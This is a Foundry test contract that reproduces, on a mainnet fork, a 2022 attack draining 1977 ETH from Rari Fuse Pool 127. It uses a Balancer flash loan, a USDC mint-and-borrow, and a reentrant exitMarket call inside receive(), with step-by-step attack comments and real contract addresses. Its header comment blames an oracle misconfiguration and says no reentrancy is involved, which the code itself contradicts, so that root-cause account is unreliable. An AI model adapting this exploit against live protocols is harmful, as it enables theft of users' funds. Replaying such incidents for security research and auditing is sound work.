// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!

/*
 * DEEP MANUAL ANALYSIS: 2022-04-Rari (Fuse Pool 127 Oracle Misconfiguration)
 *
 * VULNERABILITY:
 *   The Pool 127 Comptroller (via Unitroller delegate) trusts its PriceOracle
 *   blindly in getHypotheticalAccountLiquidityInternal and borrowAllowed.
 *   - oracle.getUnderlyingPrice(cToken) is called with no sanity, bound, or
 *     cross-asset consistency check (only `!= 0`).
 *   - In this pool the MasterPriceOracle was (mis)configured to return the
 *     ETH/USD Chainlink answer for the fUSDC market.
 *   - Consequence: 1 USDC collateral was valued at ~3526 ETH price units
 *     instead of ~1 USD, manufacturing ~3526x excess borrowing power.
 *   - borrowFresh then hands over real ETH because cashPrior >= borrowAmount
 *     and the liquidity math reported a huge surplus.
 *   No reentrancy or AMM manipulation needed; ordinary mint/enter/borrow/redeem
 *   against a lying price feed.
 *
 * ROOT CAUSE (in Comptroller logic):
 *   - getHypotheticalAccountLiquidityInternal: blindly multiplies collateral
 *     by the returned oraclePriceMantissa with no validation.
 *   - borrowAllowed: only checks `getUnderlyingPrice(...) == 0`.
 *   - The architecture (permissionless pools + single pluggable oracle per pool
 *     + no feed-to-underlying symbol matching) allows admin to wire wrong feed.
 *
 * See also: sources/Comptroller_E16DB3/Comptroller.sol (getHypothetical... and borrowAllowed)
 */

pragma solidity >=0.7.0 <0.9.0;

import "forge-std/Test.sol";
import "./../interface.sol";

contract ContractTest is Test {
    IERC20 usdc = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);

    ICEtherDelegate fETH_127 = ICEtherDelegate(payable(0x26267e41CeCa7C8E0f143554Af707336f27Fa051));

    ICErc20Delegate fusdc_127 = ICErc20Delegate(0xEbE0d1cb6A0b8569929e062d67bfbC07608f0A47);

    IUnitroller rari_Comptroller = IUnitroller(0x3f2D1BC6D02522dbcdb216b2e75eDDdAFE04B16F);

    IBalancerVault vault = IBalancerVault(0xBA12222222228d8Ba445958a75a0704d566BF2C8);
    CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);

    function setUp() public {
        cheats.createSelectFork("http://127.0.0.1:8545", 14_684_813); //fork mainnet at 14684813
    }

    function testExploit() public {
        emit log_named_uint("ETH Balance of fETH_127 before borrowing", address(fETH_127).balance / 1e18);

        // EXPLOIT STEP 0: Zero own ETH balance (so final ETH balance is purely the drained amount)
        payable(address(0)).transfer(address(this).balance);

        emit log_named_uint("ETH Balance after sending to blackHole", address(this).balance);

        // EXPLOIT STEP 1: Flash-borrow 150M USDC from Balancer Vault (zero fee).
        // This supplies the capital needed to mint a large amount of fUSDC collateral.
        // The flash loan is repaid at the very end of the same tx.
        address[] memory tokens = new address[](1);

        tokens[0] = address(usdc);

        uint256[] memory amounts = new uint256[](1);

        amounts[0] = 150_000_000 * 10 ** 6;

        vault.flashLoan(address(this), tokens, amounts, "");
    }

    function receiveFlashLoan(
        IERC20[] memory tokens,
        uint256[] memory amounts,
        uint256[] memory feeAmounts,
        bytes memory userData
    ) external {
        tokens;
        amounts;
        feeAmounts;
        userData;

        uint256 usdc_balance = usdc.balanceOf(address(this));
        emit log_named_uint("Borrow USDC from balancer", usdc_balance);
        usdc.approve(address(fusdc_127), type(uint256).max);

        fusdc_127.accrueInterest();

        // EXPLOIT STEP 2: Mint 15M USDC into fUSDC-127.
        // Because of the oracle bug, this creates ~3526x inflated collateral value
        // (the Comptroller sees it as worth tens of billions of "ETH units").
        fusdc_127.mint(15_000_000_000_000);

        uint256 fETH_Balance = fETH_127.balanceOf(address(this));

        emit log_named_uint("fETH Balance after minting", fETH_Balance);

        usdc_balance = usdc.balanceOf(address(this));

        emit log_named_uint("USDC balance after minting", usdc_balance);

        // EXPLOIT STEP 3: enterMarkets so fUSDC counts for collateralFactor * price * balance
        address[] memory ctokens = new address[](1);

        ctokens[0] = address(fusdc_127);

        rari_Comptroller.enterMarkets(ctokens);

        // EXPLOIT STEP 4: Borrow the entire fETH reserve (1977 ETH).
        // borrowAllowed calls getHypotheticalAccountLiquidityInternal.
        // The inflated USDC price makes sumCollateral >> sumBorrowPlusEffects.
        // borrowFresh sees cashPrior >= borrowAmount and transfers real ETH.
        fETH_127.borrow(1977 ether);

        emit log_named_uint("ETH Balance of fETH_127_Pool after borrowing", address(fETH_127).balance / 1e18);

        emit log_named_uint("ETH Balance of me after borrowing", address(this).balance / 1e18);

        usdc_balance = usdc.balanceOf(address(this));

        fusdc_127.approve(address(fusdc_127), type(uint256).max);

        // The receive() below will run during the ETH transfer inside borrowFresh,
        // allowing us to exitMarket before redeem.

        // EXPLOIT STEP 5: redeemUnderlying pulls the 15M USDC collateral back out.
        // Because we exited the market in receive(), no shortfall is detected.
        fusdc_127.redeemUnderlying(15_000_000_000_000);

        usdc_balance = usdc.balanceOf(address(this));

        emit log_named_uint("USDC balance after borrowing", usdc_balance);

        usdc.transfer(address(vault), usdc_balance);

        usdc_balance = usdc.balanceOf(address(this));

        emit log_named_uint("USDC balance after repayying", usdc_balance);
    }

    // EXPLOIT STEP (callback):
    // When fETH_127.borrow() transfers ETH to this contract, receive() fires.
    // We immediately exitMarket(fUSDC) so that the fUSDC we minted no longer
    // counts as collateral for the *just-created* borrow. This lets the
    // subsequent redeemUnderlying succeed without triggering INSUFFICIENT_LIQUIDITY.
    // This is a classic "post-borrow state mutation in receive" pattern that
    // the original liquidity check did not account for in the borrow path.
    receive() external payable {
        rari_Comptroller.exitMarket(address(fusdc_127));
    }
}
